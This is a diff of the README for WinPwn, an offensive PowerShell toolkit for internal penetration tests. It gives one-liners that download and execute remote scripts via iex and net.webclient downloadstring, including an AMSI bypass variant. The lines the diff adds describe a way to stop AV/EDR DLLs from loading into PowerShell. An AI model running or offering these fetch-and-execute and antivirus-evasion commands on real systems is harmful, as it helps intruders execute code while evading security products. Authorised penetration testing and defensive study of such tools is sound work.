S3cur3Th1sSh1t/WinPwn/README.md

 [![](https://img.shields.io/badge/Donate-Bitcoin-blue.svg?style=flat)](https://blockchain.info/address/1MXReD1F4w5SUXK3phLVJ5M8KrXJHfecmZ)

 # WinPwn
 In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support.
-I often ran the same scripts one after the other to get information about the current system and/or the domain.
+I also often ran the same scripts one after the other to get information about the current system and/or the domain.
 To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
 The script is mostly based on well-known large other offensive security Powershell projects.
 They are loaded into RAM via IEX Downloadstring.

 Any suggestions, feedback, Pull requests and comments are welcome!

 Just Import the Modules with:

 `Import-Module .\WinPwn.ps1` or
 `iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`

 For AMSI Bypass use the following oneliner:

 `iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')`

+Spawn a new protected PowerShell Process that is set to run with BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON process mitigation:

+`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')`

+This prevents non-microsoft DLLs (e.g. AV/EDR products) to load into PowerShell.

 If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included.